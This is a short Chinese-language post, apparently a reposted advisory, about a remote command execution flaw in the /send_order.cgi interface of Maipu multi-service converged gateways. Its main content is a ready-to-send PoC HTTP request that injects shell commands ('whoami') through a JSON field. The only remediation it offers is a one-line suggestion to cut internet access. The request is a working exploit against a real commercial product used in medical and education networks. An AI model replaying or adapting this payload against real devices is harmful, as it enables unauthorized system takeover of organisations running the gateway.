01
公司介绍
迈普通信技术股份有限公司成立于1993年,是国内领先的网络产品及解决方案供应商。
02
漏洞介绍
迈普多业务融合网关拥有融合网关功能、精准流控、上网行为管理、智能选路…等强大功能,并支持对接迈普云平台,实现远程运维和集中管理,很好的满足了医疗/教育等场景要求的全面一体化的网络需求。其接口/send_order.cgi存在远程命令执行漏洞,攻击者可通过该漏洞获取系统权限。
03
漏洞复现
2、POC
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
{"opid":"1","name":";echo -n klmns:;whoami;","type":"rest"}
04
修复建议
关闭互联网访问权限;
文章来源:网络
公众号“河北镌远网络科技有限公司”所发表内容注明来源的,版权归原出处所有(无法查证版权的或者未注明出处的均来自网络,系转载,转载的目的在于传递更多信息,版权属于原作者。如有侵权,请联系,小编会第一时间删除处理)
ps:亲爱的读者们,对于网络安全或技术方面的疑惑和好奇,您都可以在公众号的下方留言与我们互动。这里汇聚了众多专业技术人员,他们将会针对您的问题提供详细而专业的解答。我们热切期待与您一同探讨网络安全的方方面面,共同为构建安全、稳定的网络环境贡献智慧和力量。让我们一起在知识的海洋中遨游,发现更多可能!